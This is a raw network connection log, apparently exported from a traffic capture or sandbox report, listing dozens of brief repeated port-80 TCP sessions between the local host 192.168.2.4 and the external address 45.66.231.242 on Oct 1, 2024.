Oct 1, 2024 10:55:12.998733997 CEST	80	49741	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:12.998781919 CEST	49741	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:12.998862028 CEST	49741	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:13.003679991 CEST	80	49741	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:13.143902063 CEST	49742	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:13.149238110 CEST	80	49742	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:13.149308920 CEST	49742	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:13.151530981 CEST	49742	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:13.156730890 CEST	80	49742	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:13.156783104 CEST	49742	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:13.161967993 CEST	80	49742	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:13.904510975 CEST	80	49742	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:13.904625893 CEST	80	49742	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:13.904670954 CEST	49742	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:13.904670954 CEST	49742	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:13.909462929 CEST	80	49742	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:14.047036886 CEST	49744	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:14.051913023 CEST	80	49744	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:14.052081108 CEST	49744	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:14.054187059 CEST	49744	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:14.058968067 CEST	80	49744	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:14.059014082 CEST	49744	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:14.063743114 CEST	80	49744	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:14.895996094 CEST	80	49744	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:14.896035910 CEST	80	49744	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:14.896173954 CEST	49744	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:14.897154093 CEST	49744	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:14.902771950 CEST	80	49744	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:15.168606043 CEST	49747	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:15.173827887 CEST	80	49747	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:15.173908949 CEST	49747	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:15.176146984 CEST	49747	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:15.181736946 CEST	80	49747	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:15.181876898 CEST	49747	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:15.186707973 CEST	80	49747	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:15.839649916 CEST	80	49747	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:15.839772940 CEST	49747	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:15.839879036 CEST	80	49747	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:15.839935064 CEST	49747	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:15.845469952 CEST	80	49747	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:15.989687920 CEST	49749	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:15.994549990 CEST	80	49749	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:15.994631052 CEST	49749	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:15.996802092 CEST	49749	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:16.001580000 CEST	80	49749	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:16.001641035 CEST	49749	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:16.006858110 CEST	80	49749	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:16.898814917 CEST	80	49749	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:16.898829937 CEST	80	49749	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:16.898883104 CEST	49749	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:16.898957968 CEST	49749	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:16.904505968 CEST	80	49749	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:17.045388937 CEST	49752	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:17.050230980 CEST	80	49752	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:17.050307989 CEST	49752	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:17.052355051 CEST	49752	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:17.057178974 CEST	80	49752	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:17.057243109 CEST	49752	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:17.062000990 CEST	80	49752	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:20.761219025 CEST	80	49752	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:20.761743069 CEST	80	49752	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:20.761787891 CEST	49752	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:20.761787891 CEST	49752	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:20.766593933 CEST	80	49752	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:20.923779964 CEST	49753	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:20.928673029 CEST	80	49753	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:20.928740025 CEST	49753	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:20.931056023 CEST	49753	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:20.935858965 CEST	80	49753	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:20.935914040 CEST	49753	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:20.940677881 CEST	80	49753	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:21.654897928 CEST	80	49753	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:21.654930115 CEST	80	49753	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:21.655035973 CEST	49753	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:21.655097961 CEST	49753	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:21.659847021 CEST	80	49753	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:21.796468973 CEST	49754	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:21.801455021 CEST	80	49754	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:21.801580906 CEST	49754	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:21.803811073 CEST	49754	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:21.808643103 CEST	80	49754	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:21.808725119 CEST	49754	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:21.813607931 CEST	80	49754	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:22.549278021 CEST	80	49754	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:22.549343109 CEST	80	49754	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:22.549439907 CEST	49754	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:22.549484015 CEST	49754	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:22.554282904 CEST	80	49754	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:22.688172102 CEST	49755	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:22.693186045 CEST	80	49755	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:22.693274021 CEST	49755	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:22.695430994 CEST	49755	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:22.700258017 CEST	80	49755	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:22.700321913 CEST	49755	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:22.705157995 CEST	80	49755	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:23.470480919 CEST	80	49755	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:23.470571995 CEST	80	49755	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:23.470659971 CEST	49755	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:23.470730066 CEST	49755	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:23.475666046 CEST	80	49755	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:23.609608889 CEST	49756	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:23.614866018 CEST	80	49756	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:23.614964962 CEST	49756	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:23.617074013 CEST	49756	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:23.621946096 CEST	80	49756	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:23.622009993 CEST	49756	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:23.627140999 CEST	80	49756	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:24.551815987 CEST	80	49756	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:24.551903009 CEST	80	49756	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:24.552098036 CEST	49756	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:24.552139997 CEST	49756	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:24.556972027 CEST	80	49756	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:24.703252077 CEST	49757	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:24.708230019 CEST	80	49757	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:24.708362103 CEST	49757	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:24.711334944 CEST	49757	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:24.716281891 CEST	80	49757	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:24.716378927 CEST	49757	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:24.721179962 CEST	80	49757	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:25.375000954 CEST	80	49757	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:25.375102043 CEST	49757	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:25.375593901 CEST	80	49757	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:25.375662088 CEST	49757	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:25.379993916 CEST	80	49757	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:25.522154093 CEST	49758	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:25.527265072 CEST	80	49758	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:25.527353048 CEST	49758	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:25.529371977 CEST	49758	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:25.534302950 CEST	80	49758	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:25.534367085 CEST	49758	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:25.539268017 CEST	80	49758	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:26.195318937 CEST	80	49758	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:26.195341110 CEST	80	49758	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:26.195468903 CEST	49758	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:26.195521116 CEST	49758	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:26.200290918 CEST	80	49758	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:26.348516941 CEST	49759	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:26.353449106 CEST	80	49759	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:26.353539944 CEST	49759	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:26.356507063 CEST	49759	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:26.361371040 CEST	80	49759	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:26.361457109 CEST	49759	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:26.366272926 CEST	80	49759	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:27.085490942 CEST	80	49759	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:27.085516930 CEST	80	49759	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:27.085668087 CEST	49759	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:27.085697889 CEST	49759	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:27.090660095 CEST	80	49759	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:27.247751951 CEST	49760	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:27.252741098 CEST	80	49760	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:27.252851009 CEST	49760	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:27.255765915 CEST	49760	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:27.260592937 CEST	80	49760	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:27.260785103 CEST	49760	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:27.265702009 CEST	80	49760	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:27.951433897 CEST	80	49760	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:27.951450109 CEST	80	49760	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:27.951507092 CEST	49760	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:27.951574087 CEST	49760	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:27.956334114 CEST	80	49760	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:28.099199057 CEST	49761	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:28.104289055 CEST	80	49761	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:28.104408026 CEST	49761	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:28.106476068 CEST	49761	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:28.111377001 CEST	80	49761	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:28.111445904 CEST	49761	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:28.116305113 CEST	80	49761	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:28.839479923 CEST	80	49761	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:28.839510918 CEST	80	49761	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:28.839623928 CEST	49761	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:28.839646101 CEST	49761	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:28.844482899 CEST	80	49761	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:28.985111952 CEST	49762	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:28.989950895 CEST	80	49762	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:28.990036011 CEST	49762	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:28.992115974 CEST	49762	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:28.996906042 CEST	80	49762	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:28.997000933 CEST	49762	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:29.001857042 CEST	80	49762	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:29.661706924 CEST	80	49762	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:29.661828995 CEST	80	49762	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:29.661871910 CEST	49762	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:29.661883116 CEST	49762	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:29.666645050 CEST	80	49762	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:29.795840979 CEST	49763	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:29.800724030 CEST	80	49763	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:29.800843000 CEST	49763	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:29.802953959 CEST	49763	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:29.807681084 CEST	80	49763	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:29.807740927 CEST	49763	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:29.812535048 CEST	80	49763	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:30.557697058 CEST	80	49763	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:30.557740927 CEST	80	49763	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:30.557843924 CEST	49763	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:30.558480024 CEST	49763	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:30.563306093 CEST	80	49763	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:30.718663931 CEST	49764	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:30.723685980 CEST	80	49764	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:30.723767996 CEST	49764	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:30.725789070 CEST	49764	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:30.730710983 CEST	80	49764	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:30.730772018 CEST	49764	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:30.735632896 CEST	80	49764	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:31.394030094 CEST	80	49764	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:31.394066095 CEST	80	49764	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:31.394166946 CEST	49764	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:31.394506931 CEST	49764	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:31.399344921 CEST	80	49764	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:31.529520988 CEST	49765	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:31.534382105 CEST	80	49765	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:31.534487963 CEST	49765	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:31.536519051 CEST	49765	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:31.541378021 CEST	80	49765	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:31.541451931 CEST	49765	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:31.546411991 CEST	80	49765	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:32.194015026 CEST	80	49765	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:32.194134951 CEST	80	49765	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:32.194134951 CEST	49765	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:32.194181919 CEST	49765	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:32.198987007 CEST	80	49765	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:32.326328993 CEST	49766	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:32.331197977 CEST	80	49766	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:32.331311941 CEST	49766	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:32.340009928 CEST	49766	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:32.344866037 CEST	80	49766	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:32.344918966 CEST	49766	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:32.349713087 CEST	80	49766	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:33.024852037 CEST	80	49766	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:33.024996996 CEST	80	49766	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:33.025063992 CEST	49766	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:33.044754982 CEST	49766	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:33.049597025 CEST	80	49766	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:33.267741919 CEST	49767	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:33.272682905 CEST	80	49767	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:33.272824049 CEST	49767	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:33.281197071 CEST	49767	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:33.286024094 CEST	80	49767	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:33.286077976 CEST	49767	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:33.290847063 CEST	80	49767	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:33.949079990 CEST	80	49767	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:33.949323893 CEST	80	49767	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:33.949352026 CEST	49767	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:33.949381113 CEST	49767	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:33.954180002 CEST	80	49767	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:34.104058027 CEST	49768	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:34.110106945 CEST	80	49768	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:34.110220909 CEST	49768	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:34.113163948 CEST	49768	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:34.118817091 CEST	80	49768	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:34.118880987 CEST	49768	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:34.123769999 CEST	80	49768	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:34.773499012 CEST	80	49768	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:34.773689032 CEST	80	49768	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:34.773756981 CEST	49768	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:34.776962042 CEST	49768	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:34.781785011 CEST	80	49768	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:34.921327114 CEST	49769	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:34.926209927 CEST	80	49769	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:34.926306009 CEST	49769	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:34.928299904 CEST	49769	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:34.933082104 CEST	80	49769	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:34.933166027 CEST	49769	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:34.937906027 CEST	80	49769	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:35.684986115 CEST	80	49769	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:35.685005903 CEST	80	49769	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:35.685085058 CEST	49769	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:35.685126066 CEST	49769	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:35.689905882 CEST	80	49769	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:35.827267885 CEST	49770	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:35.832120895 CEST	80	49770	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:35.832209110 CEST	49770	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:35.834328890 CEST	49770	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:35.839070082 CEST	80	49770	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:35.839128017 CEST	49770	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:35.843949080 CEST	80	49770	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:36.536109924 CEST	80	49770	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:36.536184072 CEST	80	49770	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:36.536343098 CEST	49770	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:36.536499023 CEST	49770	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:36.541213989 CEST	80	49770	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:36.694921017 CEST	49771	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:36.699795961 CEST	80	49771	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:36.699868917 CEST	49771	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:36.701838970 CEST	49771	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:36.706593037 CEST	80	49771	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:36.706650972 CEST	49771	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:36.711432934 CEST	80	49771	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:37.350745916 CEST	80	49771	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:37.350894928 CEST	49771	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:37.351048946 CEST	80	49771	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:37.351099014 CEST	49771	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:37.355853081 CEST	80	49771	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:37.512420893 CEST	49772	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:37.517437935 CEST	80	49772	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:37.517522097 CEST	49772	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:37.519464970 CEST	49772	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:37.524251938 CEST	80	49772	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:37.524415970 CEST	49772	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:37.529180050 CEST	80	49772	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:38.216752052 CEST	80	49772	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:38.216871977 CEST	80	49772	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:38.216991901 CEST	49772	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:38.216991901 CEST	49772	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:38.221828938 CEST	80	49772	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:38.362103939 CEST	49773	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:38.367137909 CEST	80	49773	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:38.367235899 CEST	49773	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:38.369221926 CEST	49773	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:38.374113083 CEST	80	49773	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:38.374177933 CEST	49773	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:38.379066944 CEST	80	49773	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:39.220180988 CEST	80	49773	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:39.220263004 CEST	80	49773	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:39.220319986 CEST	49773	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:39.220319986 CEST	49773	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:39.225109100 CEST	80	49773	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:39.372920990 CEST	49774	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:39.378088951 CEST	80	49774	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:39.378216028 CEST	49774	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:39.380389929 CEST	49774	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:39.385288954 CEST	80	49774	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:39.385441065 CEST	49774	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:39.390369892 CEST	80	49774	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:40.152374029 CEST	80	49774	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:40.152426958 CEST	80	49774	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:40.152555943 CEST	49774	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:40.155678034 CEST	49774	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:40.160479069 CEST	80	49774	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:40.313312054 CEST	49775	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:40.320162058 CEST	80	49775	45.66.231.242	192.168.2.4
Oct 1, 2024 10:55:40.320255995 CEST	49775	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:40.323199034 CEST	49775	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:55:40.328038931 CEST	80	49775	45.66.231.242	192.168.2.4
